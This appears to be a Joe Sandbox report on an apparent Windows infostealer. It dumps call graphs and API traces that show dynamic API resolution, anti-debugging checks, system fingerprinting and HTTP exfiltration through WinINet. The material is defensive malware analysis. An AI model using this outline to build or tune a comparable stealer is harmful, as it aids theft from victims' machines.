API calls 29704->29705 29706 8c474e 29705->29706 29707 8c4980 2 API calls 29706->29707 29708 8c4764 29707->29708 29709 8c4980 2 API calls 29708->29709 29710 8c477a 29709->29710 29711 8c4980 2 API calls 29710->29711 29712 8c4793 29711->29712 29713 8c4980 2 API calls 29712->29713 29714 8c47a9 29713->29714 29715 8c4980 2 API calls 29714->29715 29716 8c47bf 29715->29716 29717 8c4980 2 API calls 29716->29717 29718 8c47d5 29717->29718 29719 8c4980 2 API calls 29718->29719 29720 8c47eb 29719->29720 29721 8c4980 2 API calls 29720->29721 29722 8c4801 29721->29722 29723 8c4980 2 API calls 29722->29723 29724 8c481a 29723->29724 29725 8c4980 2 API calls 29724->29725 29726 8c4830 29725->29726 29727 8c4980 2 API calls 29726->29727 29728 8c4846 29727->29728 29729 8c4980 2 API calls 29728->29729 29730 8c485c 29729->29730 29731 8c4980 2 API calls 29730->29731 29732 8c4872 29731->29732 29733 8c4980 2 API calls 29732->29733 29734 8c4888 29733->29734 29735 8c4980 2 API calls 29734->29735 29736 8c48a1 29735->29736 29737 8c4980 2 API calls 29736->29737 29738 8c48b7 29737->29738 29739 8c4980 2 API calls 29738->29739 29740 8c48cd 29739->29740 29741 8c4980 2 API calls 29740->29741 29742 8c48e3 29741->29742 29743 8c4980 2 API calls 29742->29743 29744 8c48f9 29743->29744 29745 8c4980 2 API calls 29744->29745 29746 8c490f 29745->29746 29747 8c4980 2 API calls 29746->29747 29748 8c4928 29747->29748 29749 8c4980 2 API calls 29748->29749 29750 8c493e 29749->29750 29751 8c4980 2 API calls 29750->29751 29752 8c4954 29751->29752 29753 8c4980 2 API calls 29752->29753 29754 8c496a 29753->29754 29755 8e6710 29754->29755 29756 8e6b2e 8 API calls 29755->29756 29757 8e671d 43 API calls 29755->29757 29758 8e6c38 29756->29758 29759 8e6bc4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 29756->29759 29757->29756 29760 8e6c45 8 API calls 29758->29760 29761 8e6d02 29758->29761 29759->29758 29760->29761 29762 8e6d7f 29761->29762 29763 8e6d0b GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 29761->29763 29764 8e6d8c 6 API calls 29762->29764 29765 8e6e19 29762->29765 29763->29762 29764->29765 29766 8e6e26 12 API calls 29765->29766 29767 8e6f40 29765->29767 29766->29767 29768 8e6fbd 29767->29768 29769 8e6f49 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 29767->29769 29770 8e6fc6 GetProcAddress GetProcAddress 29768->29770 29771 8e6ff1 29768->29771 29769->29768 29770->29771 29772 8e6ffa GetProcAddress GetProcAddress 29771->29772 29773 8e7025 29771->29773 29772->29773 29774 8e711d 29773->29774 29775 8e7032 10 API calls 29773->29775 29776 8e7126 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 29774->29776 29777 8e7182 29774->29777 29775->29774 29776->29777 29778 8e719e 29777->29778 29779 8e718b GetProcAddress 29777->29779 29780 8e71a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 29778->29780 29781 8e067a 29778->29781 29779->29778 29780->29781 29782 8c1410 29781->29782 30103 8c1510 29782->30103 29784 8c141b 29785 8c1435 lstrcpy 29784->29785 29786 8c143d 29784->29786 29785->29786 29787 8c1457 lstrcpy 29786->29787 29788 8c145f 29786->29788 29787->29788 29789 8c1479 lstrcpy 29788->29789 29791 8c1481 29788->29791 29789->29791 29790 8c14e5 29793 8df300 lstrlen 29790->29793 29791->29790 29792 8c14dd lstrcpy 29791->29792 29792->29790 29794 8df33e 29793->29794 29795 8df346 lstrcpy 29794->29795 29796 8df352 lstrlen 29794->29796 29795->29796 29797 8df363 29796->29797 29798 8df36b lstrcpy 29797->29798 29799 8df377 lstrlen 29797->29799 29798->29799 29800 8df388 29799->29800 29801 8df390 lstrcpy 29800->29801 29802 8df39c 29800->29802 29801->29802 29803 8df3b8 lstrcpy 29802->29803 29804 8df3c4 29802->29804 29803->29804 29805 8df3e6 lstrcpy 29804->29805 29806 8df3f2 29804->29806 29805->29806 29807 8df41c lstrcpy 29806->29807 29808 8df428 29806->29808 29807->29808 29809 8df44e lstrcpy 29808->29809 29860 8df460 29808->29860 29809->29860 29810 8df46c lstrlen 29810->29860 29811 8df626 lstrcpy 29811->29860 29812 8df504 lstrcpy 29812->29860 29813 8df529 lstrcpy 29813->29860 29814 8df656 lstrcpy 29875 8df65e 29814->29875 29815 8c1410 8 API calls 29815->29875 29816 8defe0 28 API calls 29816->29860 29817 8df100 35 API calls 29817->29875 29818 8df5e0 lstrcpy 29818->29860 29819 8df70d lstrcpy 29819->29875 29820 8df88a StrCmpCA 29824 8e0061 29820->29824 29820->29860 29821 8df788 StrCmpCA 29821->29820 29821->29875 29822 8dfbcb StrCmpCA 29832 8dfff8 29822->29832 29822->29860 29823 8df8ba lstrlen 29823->29860 29825 8e0083 lstrlen 29824->29825 29827 8e007b lstrcpy 29824->29827 29831 8e009f 29825->29831 29826 8dff0b StrCmpCA 29830 8dff1f Sleep 29826->29830 29838 8dff35 29826->29838 29827->29825 29828 8df7be lstrcpy 29828->29875 29829 8dfbfb lstrlen 29829->29860 29830->29860 29836 8e00c0 lstrlen 29831->29836 29840 8e00b8 lstrcpy 29831->29840 29833 8e001a lstrlen 29832->29833 29834 8e0012 lstrcpy 29832->29834 29845 8e0036 29833->29845 29834->29833 29835 8dfa26 lstrcpy 29835->29860 29843 8e00dc 29836->29843 29837 8df8ed lstrcpy 29837->29860 29839 8dff57 lstrlen 29838->29839 29841 8dff4f lstrcpy 29838->29841 29852 8dff73 29839->29852 29840->29836 29841->29839 29842 8dfd66 lstrcpy 29842->29860 29851 8e00fd 29843->29851 29854 8e00f5 lstrcpy 29843->29854 29844 8dfc2e lstrcpy 29844->29860 29846 8dff94 lstrlen 29845->29846 29848 8e004f lstrcpy 29845->29848 29861 8dffb0 29846->29861 29847 8df910 lstrcpy 29847->29860 29848->29846 29850 8dfa56 lstrcpy 29850->29875 29855 8c1510 4 API calls 29851->29855 29852->29846 29859 8dff8c lstrcpy 29852->29859 29853 8dfd96 lstrcpy 29853->29875 29854->29851 29877 8dffdd 29855->29877 29856 8df812 lstrcpy 29856->29875 29857 8dfc51 lstrcpy 29857->29860 29858 8c1410 8 API calls 29858->29860 29859->29846 29860->29810 29860->29811 29860->29812 29860->29813 29860->29814 29860->29816 29860->29818 29860->29820 29860->29822 29860->29823 29860->29826 29860->29829 29860->29835 29860->29837 29860->29842 29860->29844 29860->29847 29860->29850 29860->29853 29860->29857 29860->29858 29865 8df964 lstrcpy 29860->29865 29868 8dfca5 lstrcpy 29860->29868 29860->29875 29862 8dffd1 29861->29862 29863 8dffc9 lstrcpy 29861->29863 29864 8c1510 4 API calls 29862->29864 29863->29862 29864->29877 29865->29860 29866 8dfab5 lstrcpy 29866->29875 29867 8dfb30 StrCmpCA 29867->29822 29867->29875 29868->29860 29869 8dfdf5 lstrcpy 29869->29875 29870 8dfe70 StrCmpCA 29870->29826 29870->29875 29871 8dfb63 lstrcpy 29871->29875 29872 8dfea3 lstrcpy 29872->29875 29873 8defe0 28 API calls 29873->29875 29874 8dfbb7 lstrcpy 29874->29875 29875->29815 29875->29817 29875->29819 29875->29821 29875->29822 29875->29826 29875->29828 29875->29856 29875->29860 29875->29866 29875->29867 29875->29869 29875->29870 29875->29871 29875->29872 29875->29873 29875->29874 29876 8dfef7 lstrcpy 29875->29876 29876->29875 29877->28906 29880 8e735d 29878->29880 29879 8e737f 29879->28912 29880->29879 29881 8e736d lstrcpy lstrcat 29880->29881 29881->29879 29883 8e7216 29882->29883 29884 8e722c lstrcpy 29883->29884 29885 8e07f2 29883->29885 29884->29885 29886 8e26e0 GetWindowsDirectoryA 29885->29886 29887 8e272c GetVolumeInformationA 29886->29887 29888 8e2725 29886->29888 29890 8e278c GetProcessHeap RtlAllocateHeap 29887->29890 29888->29887 29891 8e27c6 wsprintfA 29890->29891 29892 8e27c2 29890->29892 29891->29892 29893 8e7210 lstrcpy 29892->29893 29894 8e07fb 29893->29894 29895 8e7240 29894->29895 29896 8e724c 29895->29896 29897 8e080b 29896->29897 29898 8e7258 lstrcpy 29896->29898 29899 8c4b80 29897->29899 29898->29897 29900 8c4ba0 29899->29900 29901 8c4bb5 29900->29901 29902 8c4bad lstrcpy 29900->29902 30113 8c4ae0 29901->30113 29902->29901 29904 8c4bc0 29905 8c4bfc lstrcpy 29904->29905 29906 8c4c08 29904->29906 29905->29906 29907 8c4c2f lstrcpy 29906->29907 29908 8c4c3b 29906->29908 29907->29908 29909 8c4c5f lstrcpy 29908->29909 29910 8c4c6b 29908->29910 29909->29910 29911 8c4c9d lstrcpy 29910->29911 29912 8c4ca9 29910->29912 29911->29912 29913 8c4cdc InternetOpenA StrCmpCA 29912->29913 29914 8c4cd0 lstrcpy 29912->29914 29915 8c4d10 29913->29915 29914->29913 29916 8c53e8 InternetCloseHandle CryptStringToBinaryA 29915->29916 30117 8e3e10 29915->30117 29917 8c5418 LocalAlloc 29916->29917 29934 8c5508 29916->29934 29919 8c542f CryptStringToBinaryA 29917->29919 29917->29934 29920 8c5459 lstrlen 29919->29920 29921 8c5447 LocalFree 29919->29921 29922 8c546d 29920->29922 29921->29934 29924 8c5487 lstrcpy 29922->29924 29925 8c5493 lstrlen 29922->29925 29923 8c4d2a 29926 8c4d53 lstrcpy lstrcat 29923->29926 29927 8c4d68 29923->29927 29924->29925 29929 8c54ad 29925->29929 29926->29927 29928 8c4d8a lstrcpy 29927->29928 29930 8c4d92 29927->29930 29928->29930 29931 8c54bf lstrcpy lstrcat 29929->29931 29932 8c54d2 29929->29932 29933 8c4da1 lstrlen 29930->29933 29931->29932 29935 8c5501 29932->29935 29937 8c54f9 lstrcpy 29932->29937 29936 8c4db9 29933->29936 29934->28930 29935->29934 29938 8c4dc5 lstrcpy lstrcat 29936->29938 29939 8c4ddc 29936->29939 29937->29935 29938->29939 29940 8c4e05 29939->29940 29941 8c4dfd lstrcpy 29939->29941 29942 8c4e0c lstrlen 29940->29942 29941->29940 29943 8c4e22 29942->29943 29944 8c4e2e lstrcpy lstrcat 29943->29944 29945 8c4e45 29943->29945 29944->29945 29946 8c4e66 lstrcpy 29945->29946 29947 8c4e6e 29945->29947 29946->29947 29948 8c4e95 lstrcpy lstrcat 29947->29948 29949 8c4eab 29947->29949 29948->29949 29950 8c4ed4 29949->29950 29951 8c4ecc lstrcpy 29949->29951 29952 8c4edb lstrlen 29950->29952 29951->29950 29953 8c4ef1 29952->29953 29954 8c4efd lstrcpy lstrcat 29953->29954 29955 8c4f14 29953->29955 29954->29955 29956 8c4f3d 29955->29956 29957 8c4f35 lstrcpy 29955->29957 29958 8c4f44 lstrlen 29956->29958 29957->29956 29959 8c4f5a 29958->29959 29960 8c4f66 lstrcpy lstrcat 29959->29960 29961 8c4f7d 29959->29961 29960->29961 29962 8c4fa9 29961->29962 29963 8c4fa1 lstrcpy 29961->29963 29964 8c4fb0 lstrlen 29962->29964 29963->29962 29965 8c4fcb 29964->29965 29966 8c4fdc lstrcpy lstrcat 29965->29966 29967 8c4fec 29965->29967 29966->29967 29968 8c500a lstrcpy lstrcat 29967->29968 29969 8c501d 29967->29969 29968->29969 29970 8c503b lstrcpy 29969->29970 29971 8c5043 29969->29971 29970->29971 29972 8c5051 InternetConnectA 29971->29972 29972->29916 29973 8c5080 HttpOpenRequestA 29972->29973 29974 8c50bb 29973->29974 29975 8c53e1 InternetCloseHandle 29973->29975 29976 8e7340 3 API calls 29974->29976 29975->29916 29977 8c50cb 29976->29977 30124 8e72b0 29977->30124 29979 8c50d4 30128 8e72f0 29979->30128 29982 8e72b0 lstrcpy 29983 8c50f0 29982->29983 29984 8e7340 3 API calls 29983->29984 29985 8c5105 29984->29985 29986 8e72b0 lstrcpy 29985->29986 29987 8c510e 29986->29987 29988 8e7340 3 API calls 29987->29988 29989 8c5124 29988->29989 29990 8e72b0 lstrcpy 29989->29990 29991 8c512d 29990->29991 29992 8e7340 3 API calls 29991->29992 29993 8c5143 29992->29993 29994 8e72b0 lstrcpy 29993->29994 29995 8c514c 29994->29995 29996 8e7340 3 API calls 29995->29996 29997 8c5161 29996->29997 29998 8e72b0 lstrcpy 29997->29998 29999 8c516a 29998->29999 30000 8e72f0 2 API calls 29999->30000 30001 8c517d 30000->30001 30002 8e72b0 lstrcpy 30001->30002 30003 8c5186 30002->30003 30004 8e7340 3 API calls 30003->30004 30005 8c519b 30004->30005 30006 8e72b0 lstrcpy 30005->30006 30007 8c51a4 30006->30007 30008 8e7340 3 API calls 30007->30008 30009 8c51b9 30008->30009 30010 8e72b0 lstrcpy 30009->30010 30011 8c51c2 30010->30011 30012 8e72f0 2 API calls 30011->30012 30013 8c51d5 30012->30013 30014 8e72b0 lstrcpy 30013->30014 30015 8c51de 30014->30015 30016 8e7340 3 API calls 30015->30016 30017 8c51f3 30016->30017 30018 8e72b0 lstrcpy 30017->30018 30019 8c51fc 30018->30019 30020 8e7340 3 API calls 30019->30020 30021 8c5212 30020->30021 30022 8e72b0 lstrcpy 30021->30022 30023 8c521b 30022->30023 30024 8e7340 3 API calls 30023->30024 30025 8c5231 30024->30025 30026 8e72b0 lstrcpy 30025->30026 30027 8c523a 30026->30027 30028 8e7340 3 API calls 30027->30028 30029 8c524f 30028->30029 30030 8e72b0 lstrcpy 30029->30030 30031 8c5258 30030->30031 30032 8e72f0 2 API calls 30031->30032 30033 8c526b 30032->30033 30034 8e72b0 lstrcpy 30033->30034 30035 8c5274 30034->30035 30036 8c52ac 30035->30036 30037 8c52a0 lstrcpy 30035->30037 30038 8e72f0 2 API calls 30036->30038 30037->30036 30039 8c52ba 30038->30039 30040 8e72f0 2 API calls 30039->30040 30041 8c52c7 30040->30041 30042 8e72b0 lstrcpy 30041->30042 30043 8c52d1 30042->30043 30044 8c52e1 lstrlen lstrlen HttpSendRequestA InternetReadFile 30043->30044 30045 8c53cc InternetCloseHandle 30044->30045 30049 8c5322 30044->30049 30047 8c53de 30045->30047 30046 8c532d lstrlen 30046->30049 30047->29975 30048 8c535e lstrcpy lstrcat 30048->30049 30049->30045 30049->30046 30049->30048 30050 8c53a3 30049->30050 30051 8c539b lstrcpy 30049->30051 30052 8c53aa InternetReadFile 30050->30052 30051->30050 30052->30045 30052->30049 30054 8d8d2d 30053->30054 30055 8d8d26 ExitProcess 30053->30055 30056 8d8f42 30054->30056 30057 8d8ecf StrCmpCA 30054->30057 30058 8d8ee8 lstrlen 30054->30058 30059 8d8de4 StrCmpCA 30054->30059 30060 8d8e04 StrCmpCA 30054->30060 30061 8d8d66 lstrlen 30054->30061 30062 8d8e1d StrCmpCA 30054->30062 30063 8d8e3d StrCmpCA 30054->30063 30064 8d8e5d StrCmpCA 30054->30064 30065 8d8e7d StrCmpCA 30054->30065 30066 8d8e9d StrCmpCA 30054->30066 30067 8d8dba lstrlen 30054->30067 30068 8d8eb6 StrCmpCA 30054->30068 30069 8d8d90 lstrlen 30054->30069 30070 8d8f1b lstrcpy 30054->30070 30056->28932 30057->30054 30058->30054 30059->30054 30060->30054 30061->30054 30062->30054 30063->30054 30064->30054 30065->30054 30066->30054 30067->30054 30068->30054 30069->30054 30070->30054 30071->28938 30072->28940 30073->28946 30074->28948 30075->28954 30076->28956 30077->28962 30078->28966 30079->28972 30080->28974 30081->28978 30082->28993 30083->28996 30084->28994 30085->28990 30086->28994 30087->29011 30088->28997 30089->29000 30090->29002 30091->29008 30092->29013 30093->29015 30094->29023 30095->29025 30096->29049 30097->29052 30098->29055 30099->29048 30100->29055 30101->29062 30104 8c151f 30103->30104 30105 8c152b lstrcpy 30104->30105 30107 8c1533 30104->30107 30105->30107 30106 8c1555 30109 8c156f lstrcpy 30106->30109 30111 8c1577 30106->30111 30107->30106 30108 8c154d lstrcpy 30107->30108 30108->30106 30109->30111 30110 8c1599 30110->29784 30111->30110 30112 8c1591 lstrcpy 30111->30112 30112->30110 30114 8c4af0 30113->30114 30114->30114 30115 8c4af7 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI lstrlen InternetCrackUrlA 30114->30115 30116 8c4b61 30115->30116 30116->29904 30118 8e3e23 30117->30118 30119 8e3e3f lstrcpy 30118->30119 30120 8e3e4b 30118->30120 30119->30120 30121 8e3e6d lstrcpy 30120->30121 30122 8e3e75 GetSystemTime 30120->30122 30121->30122 30123 8e3e93 30122->30123 30123->29923 30125 8e72bc 30124->30125 30126 8e72e4 30125->30126 30127 8e72dc lstrcpy 30125->30127 30126->29979 30127->30126 30130 8e730c 30128->30130 30129 8c50e7 30129->29982 30130->30129 30131 8e731d lstrcpy lstrcat 30130->30131 30131->30129 30138 8e30d0 GetProcessHeap RtlAllocateHeap RegOpenKeyExA RegQueryValueExA RegCloseKey 30140 8cdf00 497 API calls 30198 8d86a6 47 API calls 30179 8de169 147 API calls 30141 8cbce9 90 API calls 30142 8e08e8 1962 API calls 30143 8d8ce1 16 API calls 30160 8e3c60 GetProcessHeap RtlAllocateHeap wsprintfA lstrcpy 30207 8e3360 GetProcessHeap RtlAllocateHeap GlobalMemoryStatusEx wsprintfA 30199 8d6ff9 138 API calls 30191 8c1a64 162 API calls 30200 8cb3f9 98 API calls 30161 8c9876 145 API calls __setmbcp_nolock 30201 8e27f3 lstrcpy 30163 8e2c70 GetUserDefaultLocaleName LocalAlloc CharToOemW

                                    Executed Functions

                                    Function 008C4B80 Relevance: 116.3, APIs: 61, Strings: 5, Instructions: 807stringnetworkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008C4BAF
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008C4C02
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008C4C35
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008C4C65
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008C4CA3
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008C4CD6
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 008C4CE6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$InternetOpen
                                    • String ID: "$------$HS$hS$pS
                                    • API String ID: 2041821634-3966598223
                                    • Opcode ID: e0d9a77e0c6683bde34d384bab552be20f4c5d142d6770db4cb40bb599e21c07
                                    • Instruction ID: 5147e61fe8e26bd5f424f86656c7d82f7c2b54843b3dd5554ccfab0fcc1f8efe
                                    • Opcode Fuzzy Hash: e0d9a77e0c6683bde34d384bab552be20f4c5d142d6770db4cb40bb599e21c07
                                    • Instruction Fuzzy Hash: 6F521B31901A169BDB20EBB8D845FAE7BB9FF44310F155028BA05EB251DF34ED46CBA1
                                    Function 008E63C0 Relevance: 79.0, APIs: 32, Strings: 13, Instructions: 218libraryloaderCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1467 8e63c0-8e63ed GetPEB 1468 8e65f3-8e6653 LoadLibraryA * 5 1467->1468 1469 8e63f3-8e65ee call 8e6320 GetProcAddress * 20 1467->1469 1471 8e6668-8e666f 1468->1471 1472 8e6655-8e6663 GetProcAddress 1468->1472 1469->1468 1474 8e669c-8e66a3 1471->1474 1475 8e6671-8e6697 GetProcAddress * 2 1471->1475 1472->1471 1476 8e66b8-8e66bf 1474->1476 1477 8e66a5-8e66b3 GetProcAddress 1474->1477 1475->1474 1479 8e66d4-8e66db 1476->1479 1480 8e66c1-8e66cf GetProcAddress 1476->1480 1477->1476 1481 8e66dd-8e6702 GetProcAddress * 2 1479->1481 1482 8e6707-8e670a 1479->1482 1480->1479 1481->1482
                                    APIs
                                    • GetProcAddress.KERNEL32(74DD0000,00532308), ref: 008E6419
                                    • GetProcAddress.KERNEL32(74DD0000,005324D0), ref: 008E6432
                                    • GetProcAddress.KERNEL32(74DD0000,00532500), ref: 008E644A
                                    • GetProcAddress.KERNEL32(74DD0000,00532218), ref: 008E6462
                                    • GetProcAddress.KERNEL32(74DD0000,00539128), ref: 008E647B
                                    • GetProcAddress.KERNEL32(74DD0000,005259D0), ref: 008E6493
                                    • GetProcAddress.KERNEL32(74DD0000,005258D0), ref: 008E64AB
                                    • GetProcAddress.KERNEL32(74DD0000,00532410), ref: 008E64C4
                                    • GetProcAddress.KERNEL32(74DD0000,00532230), ref: 008E64DC
                                    • GetProcAddress.KERNEL32(74DD0000,00532248), ref: 008E64F4
                                    • GetProcAddress.KERNEL32(74DD0000,00532470), ref: 008E650D
                                    • GetProcAddress.KERNEL32(74DD0000,00525A50), ref: 008E6525
                                    • GetProcAddress.KERNEL32(74DD0000,00532440), ref: 008E653D
                                    • GetProcAddress.KERNEL32(74DD0000,00532260), ref: 008E6556
                                    • GetProcAddress.KERNEL32(74DD0000,00525710), ref: 008E656E
                                    • GetProcAddress.KERNEL32(74DD0000,00532338), ref: 008E6586
                                    • GetProcAddress.KERNEL32(74DD0000,00532350), ref: 008E659F
                                    • GetProcAddress.KERNEL32(74DD0000,005256F0), ref: 008E65B7
                                    • GetProcAddress.KERNEL32(74DD0000,00532380), ref: 008E65CF
                                    • GetProcAddress.KERNEL32(74DD0000,00525790), ref: 008E65E8
                                    • LoadLibraryA.KERNEL32(00532518,?,?,?,008E1BE3), ref: 008E65F9
                                    • LoadLibraryA.KERNEL32(00532548,?,?,?,008E1BE3), ref: 008E660B
                                    • LoadLibraryA.KERNEL32(00532578,?,?,?,008E1BE3), ref: 008E661D
                                    • LoadLibraryA.KERNEL32(005325C0,?,?,?,008E1BE3), ref: 008E662E
                                    • LoadLibraryA.KERNEL32(00532590,?,?,?,008E1BE3), ref: 008E6640
                                    • GetProcAddress.KERNEL32(75A70000,00532560), ref: 008E665D
                                    • GetProcAddress.KERNEL32(75290000,005325A8), ref: 008E6679
                                    • GetProcAddress.KERNEL32(75290000,005325D8), ref: 008E6691
                                    • GetProcAddress.KERNEL32(75BD0000,00532530), ref: 008E66AD
                                    • GetProcAddress.KERNEL32(75450000,005256B0), ref: 008E66C9
                                    • GetProcAddress.KERNEL32(76E90000,00539278), ref: 008E66E5
                                    • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 008E66FC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: 0"S$0%S$8#S$@$S$H"S$H%S$NtQueryInformationProcess$P#S$PZR$`"S$`%S$p$S$x%S
                                    • API String ID: 2238633743-2404205871
                                    • Opcode ID: 4091d193d1ef518048ac2f29d7994a9f5b6c64279f58e465bb30499bbf26dc1c
                                    • Instruction ID: 45e0e4b8ec84443b8c68e3e89c6bf7a6bd7c5e9baa127c45a35ccbb86d1f7202
                                    • Opcode Fuzzy Hash: 4091d193d1ef518048ac2f29d7994a9f5b6c64279f58e465bb30499bbf26dc1c
                                    • Instruction Fuzzy Hash: 4CA12AB5A11200AFD754DFE5ED88B377BB9F788741300851AE916C3264EF78A842DF68
                                    Function 008C4980 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2372 8c4980-8c4a1c RtlAllocateHeap 2389 8c4a1e-8c4a23 2372->2389 2390 8c4a9a-8c4ade VirtualProtect 2372->2390 2391 8c4a26-8c4a98 2389->2391 2391->2390
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008C49C3
                                    • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 008C4AD0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeapProtectVirtual
                                    • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                    • API String ID: 1542196881-3329630956
                                    • Opcode ID: db9bd2f600e420e9a889fe7eada1fd6389c3319314ca1bee22129973d93c5e14
                                    • Instruction ID: eefe8598aee56f499fe0d50944a15180ff27b186de1801d4300d6f6435f5847e
                                    • Opcode Fuzzy Hash: db9bd2f600e420e9a889fe7eada1fd6389c3319314ca1bee22129973d93c5e14
                                    • Instruction Fuzzy Hash: 73310C10B8423E7E96206BB66C46D7FBED5FF46750B10A057F62CD5384CDA45508CAE2
                                    Function 008E29E0 Relevance: 4.5, APIs: 3, Instructions: 33memoryCOMMON
